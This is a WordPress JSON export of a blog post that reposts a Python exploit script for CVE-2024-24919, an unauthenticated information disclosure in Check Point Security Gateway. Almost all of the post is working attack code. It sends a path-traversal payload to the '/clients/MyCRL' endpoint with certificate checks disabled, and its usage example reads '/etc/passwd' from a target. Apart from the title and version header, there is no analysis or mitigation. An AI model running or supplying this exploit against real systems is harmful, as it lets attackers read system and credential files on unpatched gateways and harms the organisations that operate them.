{"id":57210,"date":"2024-05-31T21:50:36","date_gmt":"2024-05-31T17:50:36","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/178872\/cpsg-disclose.txt"},"modified":"2024-05-31T21:50:36","modified_gmt":"2024-05-31T17:50:36","slug":"check-point-security-gateway-information-disclosure","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/check-point-security-gateway-information-disclosure\/","title":{"rendered":"Check Point Security Gateway Information Disclosure"},"content":{"rendered":"<pre readability=\"18\"><code readability=\"30\"># Exploit Title: Check Point Security Gateway - Information Disclosure (Unauthenticated)<br># Exploit Author: Yesith Alvarez<br># Vendor Homepage: https:\/\/support.checkpoint.com\/results\/sk\/sk182336<br># Version: R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, R81.20 <br># CVE : CVE-2024-24919<p>from requests import Request, Session<br>import sys<br>import json<\/p><p>def title():<br>print('''<\/p><p>_______ ________ ___ ___ ___ _ _ ___ _ _ ___ __ ___ <br>\/ ____\\ \\ \/ \/ ____| |__ \\ \/ _ \\__ \\| || | |__ \\| || | \/ _ \\\/_ |\/ _ \\ <br>| | \\ \\ \/ \/| |__ ______ ) | | | | ) | || |_ ______ ) | || || (_) || | (_) |<br>| | \\ \\\/ \/ | __|______\/ \/| | | |\/ \/|__ _|______\/ \/|__ _\\__, || |\\__, |<br>| |____ \\ \/ | |____ \/ \/_| |_| \/ \/_ | | \/ \/_ | | \/ \/ | | \/ \/ <br>\\_____| \\\/ |______| |____|\\___\/____| |_| |____| |_| \/_\/ |_| \/_\/ <\/p><p>Author: Yesith Alvarez<br>Github: https:\/\/github.com\/yealvarez<br>Linkedin: https:\/\/www.linkedin.com\/in\/pentester-ethicalhacker\/<br>''') <\/p><p>def exploit(url, path):<br>url = url + '\/clients\/MyCRL'<br>data = \"aCSHELL\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\"+ path<br>headers = { <br>'Connection': 'keep-alive',<br>'User-Agent': 'Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko\/20100101 Firefox\/123.0'<br>}<br>s = 
Session()<br>req = Request('POST', url, data=data, headers=headers)<br>prepped = req.prepare()<br>#del prepped.headers['Content-Type']resp = s.send(prepped,<br>verify=False,<br>timeout=15<br>) <br>print(prepped.headers)<br>print(url)<br>print(resp.headers)<br>print(resp.status_code)<\/p><p>if __name__ == '__main__':<br>title()<br>if(len(sys.argv) &lt; 3):<br>print('[+] USAGE: python3 %s https:\/\/&lt;target_url&gt; path\\n'%(sys.argv[0]))<br>print('[+] EXAMPLE: python3 %s https:\/\/192.168.0.10 \"\/etc\/passwd\"\\n'%(sys.argv[0])) <br>exit(0)<br>else:<br>exploit(sys.argv[1],sys.argv[2])<\/p><\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Check Point Security Gateway &#8211; Information Disclosure (Unauthenticated) # Exploit Author: Yesith Alvarez # Vendor Homepage: https:\/\/support.checkpoint.com\/results\/sk\/sk182336 # Version: R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, R81.20 # CVE : CVE-2024-24919 from requests import Request, Session import sys import json def title(): print('''_______ ________ ___ ___ ___ 
&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-57210","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57210","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=57210"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57210\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=57210"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=57210"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=57210"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}